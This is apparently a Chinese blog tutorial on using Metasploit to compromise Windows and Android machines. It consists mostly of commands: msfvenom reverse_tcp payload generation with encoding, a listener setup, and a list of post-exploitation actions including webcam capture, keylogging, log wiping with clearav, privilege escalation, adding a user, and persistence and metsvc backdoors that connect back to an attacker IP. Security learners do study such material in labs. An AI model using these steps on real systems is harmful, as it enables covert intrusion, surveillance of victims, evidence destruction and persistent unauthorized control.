1.1Matesploit的msfconsole模式的简单使用

2019-06-28  本文已影响0人  长江悠悠向东流

目的:使用matesploit模块获得win7权限

系统:Kali,攻击机:Kali,被攻击电脑:Win7/Win10
1,生成远控文件
Win系列:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f exe -o /root/Desktop/virus.exe -e x86/shikata_ga_nai -i 8
lhost:攻击者ip
lport:攻击者port

Android:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 R > /root/a.apk

2,Kali执行msfconsole开始监听程序(Root模式下)

msfconsole
image.png

使用handler模块

use exploit/multi/handler
image.png

设置攻击负载

set payload windows/meterpreter/reverse_tcp
image.png

设置本地监听ip和端口

set LHOST 127.0.0.1

set LPORT 4444
image.png

最后,将生成的.exe/.apk文件在windows/android上运行
在Kali上运行 run/exploit


image.png

成功得到权限



输入shell,进入windows cmd模式
image.png
其他常用命令:
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘

网络摄像头摄像头命令
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频

执行执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

迁移进程迁移
getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
kill <pid值>   #杀死进程

清除日志
clearav  #清除windows中的应用程序日志、系统日志、安全日志

getsystem提权
getsystem

远程桌面及截屏
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接

getgui命令
run getgui –h #查看帮助
run getgui -e #开启远程桌面
run getgui -u lltest2 -p 123456   #添加用户
run getgui -f 6661 –e   #3389端口转发到6661

键盘记录
keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录

后门植入

Metasploit的自带的后门有两种方式启动的,一种是通过启动项启动(持久性),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。

1)持久性启动项后门

在C:\用户*** \应用程序数据\本地的\ Temp \目录下,上传一个VBS脚本
在注册表A. HKLM \软件\微软\的Windows \ CurrentVersion \运行\加入开机启动项

run persistence –h  #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip

image
image

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit

image

2)metsvc服务后门

在C:\用户*** \应用程序数据\本地\ TEMP \上传了三个文件(metsrv.x86.dll,metsvc-SERVER.EXE,metsvc.exe),通过服务启动,服务名为Meterpreter就会

run metsvc –h   # 查看帮助
run metsvc –A   #自动安装后门

image
image

连接后门

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit

image

然后,开始你的冒险之旅吧!

上一篇下一篇

猜你喜欢

热点阅读